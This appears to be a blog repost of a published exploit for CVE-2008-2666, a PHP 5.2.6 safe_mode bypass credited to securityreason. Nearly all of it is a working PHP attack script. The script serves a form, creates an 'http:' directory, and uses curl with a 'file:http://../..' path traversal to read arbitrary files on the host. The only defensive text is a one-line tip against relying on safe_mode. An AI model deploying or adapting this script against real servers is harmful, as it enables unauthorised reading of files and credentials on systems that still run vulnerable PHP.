PHP 5.2.6 safe_mode bypass
Size:
Large, Medium,
Small
Fri Oct 10, 08 11:12 PM
| Category:
PHP Bugs
Topic : PHP 5.2.6 safe_mode bypass
ExploitAlert : 10
Credit : Maksymilian Arciemowicz
Date : 29.6.2008
Exploit Code :
<?php
/*
Exploit for CVE-2008-2666:
http://securityreason.com/achievement_securityalert/55
Orginal URL
http://securityreason.com/achievement_exploitalert/10
safe_mode Bypass PHP 5.2.6
by Maksymilian Arciemowicz http://securityreason.com
cxib [at] securityreason [dot] com
How to fix?
Do not use safe_mode as a main safety
*/
eCHo "<PRE><P>This is exploit from <a
href=\"http://securityreason.com\">http://securityreason.com</a>
Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode
bypass<p>More: <a
href=\"http://securityreason.com/news/0/0x24\">http://securityreason.com/ne
ws/0/0x24</a><p><form name=\"form\"
action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_N
AME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\"
value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\"
value=\"Show\"></form>\n";
if(!IS_dir(dirname(__FILE__)."/http:")){ // can work without this
requirement
if(!IS_writable(dirname(__FILE__))) die("<b>I can't create http:
directory</b>");
mkDIR("http:");
}
if(Empty($file) aNd Empty($_GET['file']) aNd Empty($_POST['file']))
diE("\n".$karatonik);
if(!empty($_GET['file'])) $file=$_GET['file'];
if(!empty($_POST['file'])) $file=$_POST['file'];
if((curl_exec(curl_init("file:http://../../../../../../../../../../../../..
/../../../../../../../../../../../../../../../../../../../../".$file))) aNd
!emptY($file)) die("<B><br>best regards cxib from
securityreason.com</B></FONT>");
elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have
permissions.</CENTER></FONT>");
?>
courtesy : securityreason
Link:
http://blog.bitcomet.com/aley182/post_69625/
©
Add to favorites |
Quote
Reads (259) | Comments (0)
